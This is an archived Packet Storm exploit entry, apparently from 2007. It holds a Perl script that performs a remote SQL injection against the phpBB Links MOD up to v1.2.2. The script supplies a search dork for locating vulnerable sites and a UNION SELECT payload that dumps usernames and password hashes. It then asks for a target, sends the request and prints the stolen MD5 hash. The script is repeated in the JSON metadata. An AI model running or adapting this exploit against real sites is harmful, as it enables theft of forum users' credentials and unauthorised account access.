ID PACKETSTORM:58978
Type packetstorm
Reporter Don
Modified 2007-08-31T00:00:00
Description
`#!/usr/bin/perl
print q{
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
`
{"type": "packetstorm", "published": "2007-08-31T00:00:00", "reporter": "Don", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d7e6e81266847a14a81ece7005f271d8"}, {"key": "modified", "hash": "5f0548b8682eda9a0bf935bb46f9014d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5f0548b8682eda9a0bf935bb46f9014d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b70e7b267b0652ee4030c4043cba7cf7"}, {"key": "sourceData", "hash": "d30bf810ca131b97e2235bdd8d60a89f"}, {"key": "sourceHref", "hash": "339d0a827207b7e606c3f4ec7a978107"}, {"key": "title", "hash": "9b762fb31ed0973cfeb6b2ca81dc3a17"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl \n \nprint q{ \n \nphpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit \n \nBug discovered by Don \nDork: allinurl:links.php?t=search \nor: \"Links MOD v1.2.2 by phpBB2.de\" \nSQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/* \n \n}; \n \nuse IO::Socket; \n \nprint q{ \n=> Insert URL \n=> without ( http ) \n=> }; \n$server = <STDIN>; \nchop ($server); \nprint q{ \n=> Insert directory \n=> es: /forum/ - /phpBB2/ \n=> }; \n$dir = <STDIN>; \nchop ($dir); \nprint q{ \n=> User ID \n=> Number: \n=> }; \n$user = <STDIN>; \nchop ($user); \nif (!$ARGV[2]) { \n} \n$myuser = $ARGV[3]; \n$mypass = $ARGV[4]; \n$myid = $ARGV[5]; \n$server =~ s/(http:\\/\\/)//eg; \n$path = $dir; \n$path .= \"links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=\".$user.\"/*\"; \nprint \" \nExploit in process...\\r\\n\"; \n$socket = IO::Socket::INET->new( \nProto => \"tcp\", \nPeerAddr => \"$server\", \nPeerPort => \"80\") || die \"Exploit failed\"; \nprint \"Exploit\\r\\n\"; \nprint \"in process...\\r\\n\"; \nprint $socket \"GET $path HTTP/1.1\\r\\n\"; \nprint $socket \"Host: $server\\r\\n\"; \nprint $socket \"Accept: */*\\r\\n\"; \nprint $socket \"Connection: close\\r\\n\\r\\n\"; \nprint \"Exploit finished!\\r\\n\\r\\n\"; \nwhile ($answer = <$socket>) \n{ \nif ($answer =~/(\\w{32})/) \n{ \nif ($1 ne 0) { \nprint \"MD5-Hash is: \".$1.\"\\r\\n\"; \n} \nexit(); \n} \n} \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:21:03", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/58978/phpbblinks-sql.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/58978/phpbblinks-sql.txt", "title": "phpbblinks-sql.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:58978", "hash": "8e4ae7e7ef2dd3cbaa4458097e16575f9f54cd3c793c09cdd4a66537bf477ab3", "edition": 1, "cvelist": [], "modified": "2007-08-31T00:00:00", "description": ""}
{}
